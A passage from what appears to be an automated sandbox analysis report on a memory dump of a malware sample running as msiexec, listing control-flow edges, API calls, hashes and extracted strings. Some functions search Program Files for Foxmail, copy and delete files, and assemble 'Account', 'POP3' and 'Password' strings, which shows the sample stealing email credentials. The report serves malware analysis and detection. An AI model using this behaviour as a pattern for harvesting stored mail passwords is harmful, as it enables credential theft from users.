7022->7024 7023 235f56f9 RtlAllocateHeap 7023->7024 7023->7026 7024->7003 7027 235f6e20 7024->7027 7025 235f474f __dosmaperr 7 API calls 7025->7026 7026->7021 7026->7023 7026->7025 7028 235f69f3 40 API calls 7027->7028 7029 235f6e3f 7028->7029 7032 235f6e90 IsValidCodePage 7029->7032 7034 235f6e46 7029->7034 7036 235f6eb5 ___scrt_fastfail 7029->7036 7030 235f2ada _ValidateLocalCookies 5 API calls 7031 235f6cc1 7030->7031 7031->7007 7031->7010 7033 235f6ea2 GetCPInfo 7032->7033 7032->7034 7033->7034 7033->7036 7034->7030 7040 235f6acb GetCPInfo 7036->7040 7113 235f6886 7037->7113 7039 235f68ed 7039->7003 7041 235f6b05 7040->7041 7042 235f6baf 7040->7042 7050 235f86e4 7041->7050 7045 235f2ada _ValidateLocalCookies 5 API calls 7042->7045 7046 235f6c5b 7045->7046 7046->7034 7049 235f8a3e 43 API calls 7049->7042 7051 235f54a7 __fassign 38 API calls 7050->7051 7052 235f8704 MultiByteToWideChar 7051->7052 7054 235f8742 7052->7054 7062 235f87da 7052->7062 7056 235f56d0 21 API calls 7054->7056 7059 235f8763 ___scrt_fastfail 7054->7059 7055 235f2ada _ValidateLocalCookies 5 API calls 7057 235f6b66 7055->7057 7056->7059 7064 235f8a3e 7057->7064 7058 235f87d4 7069 235f8801 7058->7069 7059->7058 7061 235f87a8 MultiByteToWideChar 7059->7061 7061->7058 7063 235f87c4 GetStringTypeW 7061->7063 7062->7055 7063->7058 7065 235f54a7 __fassign 38 API calls 7064->7065 7066 235f8a51 7065->7066 7073 235f8821 7066->7073 7070 235f881e 7069->7070 7071 235f880d 7069->7071 7070->7062 7071->7070 7072 235f571e _free 20 API calls 7071->7072 7072->7070 7074 235f883c 7073->7074 7075 235f8862 MultiByteToWideChar 7074->7075 7076 235f888c 7075->7076 7077 235f8a16 7075->7077 7081 235f56d0 21 API calls 7076->7081 7083 235f88ad 7076->7083 7078 235f2ada _ValidateLocalCookies 5 API calls 7077->7078 7079 235f6b87 7078->7079 7079->7049 7080 235f88f6 MultiByteToWideChar 7082 235f890f 7080->7082 7095 235f8962 7080->7095 7081->7083 7100 235f5f19 7082->7100 7083->7080 7083->7095 7085 235f8801 __freea 20 API calls 
6857->6853 6917 235f24b5 6858->6917 6860 235f23e5 6860->6839 6861->6841 6864 235f46dc 6862->6864 6863 235f2ada _ValidateLocalCookies 5 API calls 6865 235f1fad 6863->6865 6864->6863 6865->6832 6866 235f23b3 6865->6866 6867 235f23b8 ___scrt_release_startup_lock 6866->6867 6868 235f2933 ___isa_available_init IsProcessorFeaturePresent 6867->6868 6869 235f23c1 6867->6869 6868->6869 6869->6845 6871 235f2491 6870->6871 6872 235f34ea 6871->6872 6873 235f34ef ___vcrt_initialize_winapi_thunks 6872->6873 6884 235f3936 6873->6884 6876 235f34fd 6876->6852 6878 235f3505 6879 235f3510 6878->6879 6880 235f3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6878->6880 6879->6852 6880->6876 6913 235f7457 6881->6913 6885 235f393f 6884->6885 6887 235f3968 6885->6887 6889 235f34f9 6885->6889 6898 235f3be0 6885->6898 6888 235f3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6887->6888 6888->6889 6889->6876 6890 235f38e8 6889->6890 6903 235f3af1 6890->6903 6895 235f3918 6895->6878 6896 235f391b ___vcrt_uninitialize_ptd 6 API calls 6897 235f38fd 6896->6897 6897->6878 6899 235f3a82 try_get_function 5 API calls 6898->6899 6900 235f3bfa 6899->6900 6901 235f3c18 InitializeCriticalSectionAndSpinCount 6900->6901 6902 235f3c03 6900->6902 6901->6902 6902->6885 6904 235f3a82 try_get_function 5 API calls 6903->6904 6905 235f3b0b 6904->6905 6906 235f3b24 TlsAlloc 6905->6906 6907 235f38f2 6905->6907 6907->6897 6908 235f3ba2 6907->6908 6909 235f3a82 try_get_function 5 API calls 6908->6909 6910 235f3bbc 6909->6910 6911 235f390b 6910->6911 6912 235f3bd7 TlsSetValue 6910->6912 6911->6895 6911->6896 6912->6911 6916 235f7470 6913->6916 6914 235f2ada _ValidateLocalCookies 5 API calls 6915 235f24a3 6914->6915 6915->6856 6915->6857 6916->6914 6918 235f24c8 6917->6918 6919 235f24c4 6917->6919 6920 235f2639 ___scrt_fastfail 4 API calls 6918->6920 6922 235f24d5 ___scrt_release_startup_lock 6918->6922 6919->6860 6921 235f2559 6920->6921 6922->6860 7445 235f5bff 7453 235f5d5c 7445->7453 7448 235f5c13 
7449 235f5b7a __dosmaperr 20 API calls 7450 235f5c1b 7449->7450 7451 235f5c28 7450->7451 7452 235f5c2b 11 API calls 7450->7452 7452->7448 7454 235f5c45 __dosmaperr 5 API calls 7453->7454 7455 235f5d83 7454->7455 7456 235f5d9b TlsAlloc 7455->7456 7459 235f5d8c 7455->7459 7456->7459 7457 235f2ada _ValidateLocalCookies 5 API calls 7458 235f5c09 7457->7458 7458->7448 7458->7449 7459->7457 7542 235f67bf 7547 235f67f4 7542->7547 7545 235f67db 7546 235f571e _free 20 API calls 7546->7545 7548 235f6806 7547->7548 7549 235f67cd 7547->7549 7550 235f680b 7548->7550 7551 235f6836 7548->7551 7549->7545 7549->7546 7552 235f637b __dosmaperr 20 API calls 7550->7552 7551->7549 7558 235f71d6 7551->7558 7554 235f6814 7552->7554 7556 235f571e _free 20 API calls 7554->7556 7555 235f6851 7557 235f571e _free 20 API calls 7555->7557 7556->7549 7557->7549 7559 235f71e1 7558->7559 7560 235f7209 7559->7560 7562 235f71fa 7559->7562 7561 235f7218 7560->7561 7567 235f8a98 7560->7567 7574 235f8acb 7561->7574 7564 235f6368 _free 20 API calls 7562->7564 7566 235f71ff ___scrt_fastfail 7564->7566 7566->7555 7568 235f8ab8 RtlSizeHeap 7567->7568 7569 235f8aa3 7567->7569 7568->7561 7570 235f6368 _free 20 API calls 7569->7570 7571 235f8aa8 7570->7571 7572 235f62ac _abort 26 API calls 7571->7572 7573 235f8ab3 7572->7573 7573->7561 7575 235f8ad8 7574->7575 7576 235f8ae3 7574->7576 7577 235f56d0 21 API calls 7575->7577 7578 235f8aeb 7576->7578 7584 235f8af4 __dosmaperr 7576->7584 7583 235f8ae0 7577->7583 7579 235f571e _free 20 API calls 7578->7579 7579->7583 7580 235f8b1e RtlReAllocateHeap 7580->7583 7580->7584 7581 235f8af9 7582 235f6368 _free 20 API calls 7581->7582 7582->7583 7583->7566 7584->7580 7584->7581 7585 235f474f __dosmaperr 7 API calls 7584->7585 7585->7584 6923 235f543d 6924 235f5440 6923->6924 6925 235f55a8 _abort 38 API calls 6924->6925 6926 235f544c 6925->6926 7586 235f9db8 7587 235f9dbf 7586->7587 7588 235f9e20 7587->7588 7592 235f9ddf 7587->7592 7589 235faa17 21 API calls 7588->7589 7590 
235fa90e 7588->7590 7591 235f9e6e 7589->7591 7592->7590 7593 235faa17 21 API calls 7592->7593 7594 235fa93e 7593->7594 7595 235f3eb3 7596 235f5411 38 API calls 7595->7596 7597 235f3ebb 7596->7597 6719 235f9e71 6720 235f9e95 6719->6720 6722 235fac6b __startOneArgErrorHandling 6720->6722 6723 235f9eae 6720->6723 6721 235f9ef8 6726 235facad __startOneArgErrorHandling 6722->6726 6737 235fb2f0 6722->6737 6723->6721 6727 235faa53 6723->6727 6728 235faa70 RtlDecodePointer 6727->6728 6729 235faa80 6727->6729 6728->6729 6730 235fab0d 6729->6730 6733 235fab02 6729->6733 6735 235faab7 6729->6735 6730->6733 6734 235f6368 _free 20 API calls 6730->6734 6731 235f2ada _ValidateLocalCookies 5 API calls 6732 235fac67 6731->6732 6732->6721 6733->6731 6734->6733 6735->6733 6736 235f6368 _free 20 API calls 6735->6736 6736->6733 6738 235fb329 __startOneArgErrorHandling 6737->6738 6739 235fb5c1 __raise_exc RaiseException 6738->6739 6740 235fb350 __startOneArgErrorHandling 6738->6740 6739->6740 6741 235fb393 6740->6741 6742 235fb36e 6740->6742 6743 235fb8b2 __startOneArgErrorHandling 20 API calls 6741->6743 6748 235fb8e1 6742->6748 6745 235fb38e __startOneArgErrorHandling 6743->6745 6746 235f2ada _ValidateLocalCookies 5 API calls 6745->6746 6747 235fb3b7 6746->6747 6747->6726 6749 235fb8f0 6748->6749 6750 235fb90f __startOneArgErrorHandling 6749->6750 6751 235fb964 __startOneArgErrorHandling 6749->6751 6752 235f78a3 __startOneArgErrorHandling 5 API calls 6750->6752 6753 235fb8b2 __startOneArgErrorHandling 20 API calls 6751->6753 6754 235fb950 6752->6754 6756 235fb95d 6753->6756 6755 235fb8b2 __startOneArgErrorHandling 20 API calls 6754->6755 6754->6756 6755->6756 6756->6745 6757 235f3370 6768 235f3330 6757->6768 6769 235f334f 6768->6769 6770 235f3342 6768->6770 6771 235f2ada _ValidateLocalCookies 5 API calls 6770->6771 6771->6769 6927 235f5630 6928 235f563b 6927->6928 6930 235f5664 6928->6930 6932 235f5660 6928->6932 6933 235f5eb7 6928->6933 6940 235f5688 6930->6940 6934 235f5c45 
__dosmaperr 5 API calls 6933->6934 6935 235f5ede 6934->6935 6936 235f5efc InitializeCriticalSectionAndSpinCount 6935->6936 6937 235f5ee7 6935->6937 6936->6937 6938 235f2ada _ValidateLocalCookies 5 API calls 6937->6938 6939 235f5f13 6938->6939 6939->6928 6941 235f56b4 6940->6941 6942 235f5695 6940->6942 6941->6932 6943 235f569f RtlDeleteCriticalSection 6942->6943 6943->6941 6943->6943 7460 235f63f0 7461 235f6400 7460->7461 7468 235f6416 7460->7468 7462 235f6368 _free 20 API calls 7461->7462 7463 235f6405 7462->7463 7464 235f62ac _abort 26 API calls 7463->7464 7466 235f640f 7464->7466 7465 235f4e76 20 API calls 7472 235f64e5 7465->7472 7467 235f6480 7467->7465 7467->7467 7468->7467 7473 235f6561 7468->7473 7479 235f6580 7468->7479 7470 235f64ee 7471 235f571e _free 20 API calls 7470->7471 7471->7473 7472->7470 7476 235f6573 7472->7476 7490 235f85eb 7472->7490 7499 235f679a 7473->7499 7477 235f62bc _abort 11 API calls 7476->7477 7478 235f657f 7477->7478 7480 235f658c 7479->7480 7480->7480 7481 235f637b __dosmaperr 20 API calls 7480->7481 7482 235f65ba 7481->7482 7483 235f85eb 26 API calls 7482->7483 7484 235f65e6 7483->7484 7485 235f62bc _abort 11 API calls 7484->7485 7486 235f6615 ___scrt_fastfail 7485->7486 7487 235f66b6 FindFirstFileExA 7486->7487 7488 235f6705 7487->7488 7489 235f6580 26 API calls 7488->7489 7492 235f853a 7490->7492 7491 235f854f 7493 235f6368 _free 20 API calls 7491->7493 7494 235f8554 7491->7494 7492->7491 7492->7494 7497 235f858b 7492->7497 7495 235f857a 7493->7495 7494->7472 7496 235f62ac _abort 26 API calls 7495->7496 7496->7494 7497->7494 7498 235f6368 _free 20 API calls 7497->7498 7498->7495 7500 235f67a4 7499->7500 7501 235f67b4 7500->7501 7502 235f571e _free 20 API calls 7500->7502 7503 235f571e _free 20 API calls 7501->7503 7502->7500 7504 235f67bb 7503->7504 7504->7466 6772 235f506f 6773 235f5087 6772->6773 6774 235f5081 6772->6774 6776 235f5000 6774->6776 6780 235f502a 6776->6780 6781 235f500d 6776->6781 6777 235f5024 6779 235f571e 
_free 20 API calls 6777->6779 6778 235f571e _free 20 API calls 6778->6781 6779->6780 6780->6773 6781->6777 6781->6778 7602 235f60ac 7603 235f60dd 7602->7603 7604 235f60b7 7602->7604 7604->7603 7605 235f60c7 FreeLibrary 7604->7605 7605->7604 6782 235fac6b 6783 235fac84 __startOneArgErrorHandling 6782->6783 6784 235fb2f0 21 API calls 6783->6784 6785 235facad __startOneArgErrorHandling 6783->6785 6784->6785 6944 235f742b 6947 235f7430 6944->6947 6946 235f7453 6947->6946 6948 235f8bae 6947->6948 6949 235f8bbb 6948->6949 6950 235f8bdd 6948->6950 6951 235f8bc9 RtlDeleteCriticalSection 6949->6951 6952 235f8bd7 6949->6952 6950->6947 6951->6951 6951->6952 6953 235f571e _free 20 API calls 6952->6953 6953->6950 7606 235fc7a7 7607 235fc7be 7606->7607 7614 235fc80d 7606->7614 7607->7614 7615 235fc7e6 GetModuleHandleA 7607->7615 7609 235fc835 GetModuleHandleA 7609->7614 7610 235fc872 7611 235fc85f GetProcAddress 7611->7614 7614->7609 7614->7610 7614->7611 7616 235fc7ef 7615->7616 7622 235fc80d 7615->7622 7624 235fc803 GetProcAddress 7616->7624 7619 235fc835 GetModuleHandleA 7619->7622 7620 235fc872 7622->7619 7622->7620 7623 235fc85f GetProcAddress 7622->7623 7623->7622 7627 235fc80d 7624->7627 7625 235fc835 GetModuleHandleA 7625->7627 7626 235fc872 7627->7625 7627->7626 7628 235fc85f GetProcAddress 7627->7628 7628->7627 7629 235f21a1 ___scrt_dllmain_exception_filter 7505 235fa1e0 7508 235fa1fe 7505->7508 7507 235fa1f6 7511 235fa203 7508->7511 7509 235fa298 7509->7507 7510 235faa53 21 API calls 7512 235fa42f 7510->7512 7511->7509 7511->7510 7512->7507 7630 235f81a0 7631 235f81d9 7630->7631 7632 235f81dd 7631->7632 7643 235f8205 7631->7643 7633 235f6368 _free 20 API calls 7632->7633 7635 235f81e2 7633->7635 7634 235f8529 7637 235f2ada _ValidateLocalCookies 5 API calls 7634->7637 7636 235f62ac _abort 26 API calls 7635->7636 7639 235f81ed 7636->7639 7638 235f8536 7637->7638 7640 235f2ada _ValidateLocalCookies 5 API calls 7639->7640 7642 235f81f9 7640->7642 7643->7634 7644 235f80c0 
7643->7644 7645 235f80db 7644->7645 7646 235f2ada _ValidateLocalCookies 5 API calls 7645->7646 7647 235f8152 7646->7647 7647->7643

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 235F1137
                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 235F1151
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 235F115C
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 235F116D
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 235F117C
                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 235F1193
                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 235F11D0
                                                                            • FindClose.KERNEL32(00000000), ref: 235F11DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                            • String ID:
                                                                            • API String ID: 1083526818-0
                                                                            • Opcode ID: 15789733ecceceee9113b20b5649d572d01d5f97333a297d1715b2da50ca60f8
                                                                            • Instruction ID: a3e5340a086e18090ee3a137b1accf4ad2ab0ad4b3b7a17bb9ac6784766fbf8e
                                                                            • Opcode Fuzzy Hash: 15789733ecceceee9113b20b5649d572d01d5f97333a297d1715b2da50ca60f8
                                                                            • Instruction Fuzzy Hash: C4216F725043486BD720EA64AC4CF9B7BECEF85314F04096ABA5CD3190FB75D6098796

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 235F1434
                                                                              • Part of subcall function 235F10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 235F1137
                                                                              • Part of subcall function 235F10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 235F1151
                                                                              • Part of subcall function 235F10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 235F115C
                                                                              • Part of subcall function 235F10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 235F116D
                                                                              • Part of subcall function 235F10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 235F117C
                                                                              • Part of subcall function 235F10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 235F1193
                                                                              • Part of subcall function 235F10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 235F11D0
                                                                              • Part of subcall function 235F10F1: FindClose.KERNEL32(00000000), ref: 235F11DB
                                                                            • lstrlenW.KERNEL32(?), ref: 235F14C5
                                                                            • lstrlenW.KERNEL32(?), ref: 235F14E0
                                                                            • lstrlenW.KERNEL32(?,?), ref: 235F150F
                                                                            • lstrcatW.KERNEL32(00000000), ref: 235F1521
                                                                            • lstrlenW.KERNEL32(?,?), ref: 235F1547
                                                                            • lstrcatW.KERNEL32(00000000), ref: 235F1553
                                                                            • lstrlenW.KERNEL32(?,?), ref: 235F1579
                                                                            • lstrcatW.KERNEL32(00000000), ref: 235F1585
                                                                            • lstrlenW.KERNEL32(?,?), ref: 235F15AB
                                                                            • lstrcatW.KERNEL32(00000000), ref: 235F15B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                            • String ID: )$Foxmail$ProgramFiles
                                                                            • API String ID: 672098462-2938083778
                                                                            • Opcode ID: 0672737baea56e352126acaa9dd2138ae2eadbba441f6eabc25334f3970571a6
                                                                            • Instruction ID: 6661c667b92c01fd99d0e239c4de0b6341a3856d596a49eb77852a3ff4c71743
                                                                            • Opcode Fuzzy Hash: 0672737baea56e352126acaa9dd2138ae2eadbba441f6eabc25334f3970571a6
                                                                            • Instruction Fuzzy Hash: 8681AF75A40358AADB30DBA1AC86FEE737DEF85700F0005DAE508E7190EB715B85CB95
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 235F61DA
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 235F61E4
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 235F61F1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID: [nk/
                                                                            • API String ID: 3906539128-416449849
                                                                            • Opcode ID: 4e9d1a6b078aef7efd78cd0c2e653a9f591ab1af34665d9189f0c3edbafc728e
                                                                            • Instruction ID: 6a21dff581d90741bbec95f48036ac490b4b5cb5ff823e7c2908285ef293027f
                                                                            • Opcode Fuzzy Hash: 4e9d1a6b078aef7efd78cd0c2e653a9f591ab1af34665d9189f0c3edbafc728e
                                                                            • Instruction Fuzzy Hash: E031D4B491121CABCB21DF24D988B8DBBF8FF59310F5041DAE81CA7250E7349B858F85
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .$[nk/
                                                                            • API String ID: 0-1421376372
                                                                            • Opcode ID: d6c7a718f85cbc86213945df3e1a00825106d90cf08715032dce04939cd5d180
                                                                            • Instruction ID: 0efc05e466774387ea2fe75a9816c4bfbdbbd4e56ff8b8fad83f88834e1b5b12
                                                                            • Opcode Fuzzy Hash: d6c7a718f85cbc86213945df3e1a00825106d90cf08715032dce04939cd5d180
                                                                            • Instruction Fuzzy Hash: 4331E371900209AFCB24AE78DC84EEB7BFDDB87304F1401E8E91DD7295E6319A458BA0
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,?,235F4A8A,?,23602238,0000000C,235F4BBD,00000000,00000000,00000001,235F2082,23602108,0000000C,235F1F3A,?), ref: 235F4AD5
                                                                            • TerminateProcess.KERNEL32(00000000,?,235F4A8A,?,23602238,0000000C,235F4BBD,00000000,00000000,00000001,235F2082,23602108,0000000C,235F1F3A,?), ref: 235F4ADC
                                                                            • ExitProcess.KERNEL32 ref: 235F4AEE
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: fbc30189958027d1df216fa7e5872160744bb0f60e6291c7f9cc63cb9a1c8691
                                                                            • Instruction ID: 92286a68bb62707db5f0d577b77d59980484286e6a8c26e76909ef89a688acd7
                                                                            • Opcode Fuzzy Hash: fbc30189958027d1df216fa7e5872160744bb0f60e6291c7f9cc63cb9a1c8691
                                                                            • Instruction Fuzzy Hash: 34E0B676100208AFCF117F66DD09E493BAEFF52341B508055FA4D8B125EB3AE943CA54
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: HeapProcess
                                                                            • String ID:
                                                                            • API String ID: 54951025-0
                                                                            • Opcode ID: 02b1a3afcf951c7ad8118afd16222736d257a7387701d192c27bae3614c2f99a
                                                                            • Instruction ID: a0b199cb640ef63bd299a23303c178f3ff20a7591f0ca88ceedd1ef3c5dc1b0f
                                                                            • Opcode Fuzzy Hash: 02b1a3afcf951c7ad8118afd16222736d257a7387701d192c27bae3614c2f99a
                                                                            • Instruction Fuzzy Hash: DDA011302002028F8300AE30820A20C3AECFA22282328002AA80CC0008FB28C0028A00
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalEnterSection
                                                                            • String ID:
                                                                            • API String ID: 1904992153-0
                                                                            • Opcode ID: e42394f4babbb5e6466844ab6ee51f12682bbc41703e4f35b4ee518ed6e5d288
                                                                            • Instruction ID: c4aa098bcbe5cbf4ea655da1e4753b8ac9c780392a826699222d92fa4e4ca319
                                                                            • Opcode Fuzzy Hash: e42394f4babbb5e6466844ab6ee51f12682bbc41703e4f35b4ee518ed6e5d288
                                                                            • Instruction Fuzzy Hash: DE2190319003088FCB10EB68E480BAD77B5BF66368F3446C8D52CB7290C73DD9458B59

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 235F1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D1B
                                                                              • Part of subcall function 235F1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 235F1D37
                                                                              • Part of subcall function 235F1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D4B
                                                                            • _strlen.LIBCMT ref: 235F1855
                                                                            • _strlen.LIBCMT ref: 235F1869
                                                                            • _strlen.LIBCMT ref: 235F188B
                                                                            • _strlen.LIBCMT ref: 235F18AE
                                                                            • _strlen.LIBCMT ref: 235F18C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen$File$CopyCreateDelete
                                                                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                            • API String ID: 3296212668-3023110444
                                                                            • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                            • Instruction ID: 6256500f803eb95289c02468895c49b41bad76cc20052489523c9d5cbd6a5403
                                                                            • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                            • Instruction Fuzzy Hash: A9610271D00318AAEF21DBA4E940BDEB7B9AF57200F4444DAD209A7250DB749B478B96

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID: %m$~$Gon~$~F@7$~dra
                                                                            • API String ID: 4218353326-230879103
                                                                            • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                            • Instruction ID: 1b3f8842eca3d5570e46b5b3c79a79646d0b7125aff0c8e9fb5a3a93280442cf
                                                                            • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                            • Instruction Fuzzy Hash: E071F7B1D002286BDF21ABB4A894ADF7BFCAF56300F1440D6D64CE7241E675D786CBA0

                                                                            Control-flow Graph

                                                                            Control-flow graph edge list for the function starting at 235f7cc2 (rendered graph not included)
                                                                            APIs
                                                                            • ___free_lconv_mon.LIBCMT ref: 235F7D06
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F90D7
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F90E9
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F90FB
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F910D
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F911F
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F9131
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F9143
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F9155
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F9167
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F9179
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F918B
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F919D
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F91AF
                                                                            • _free.LIBCMT ref: 235F7CFB
                                                                              • Part of subcall function 235F571E: HeapFree.KERNEL32(00000000,00000000,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?), ref: 235F5734
                                                                              • Part of subcall function 235F571E: GetLastError.KERNEL32(?,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?,?), ref: 235F5746
                                                                            • _free.LIBCMT ref: 235F7D1D
                                                                            • _free.LIBCMT ref: 235F7D32
                                                                            • _free.LIBCMT ref: 235F7D3D
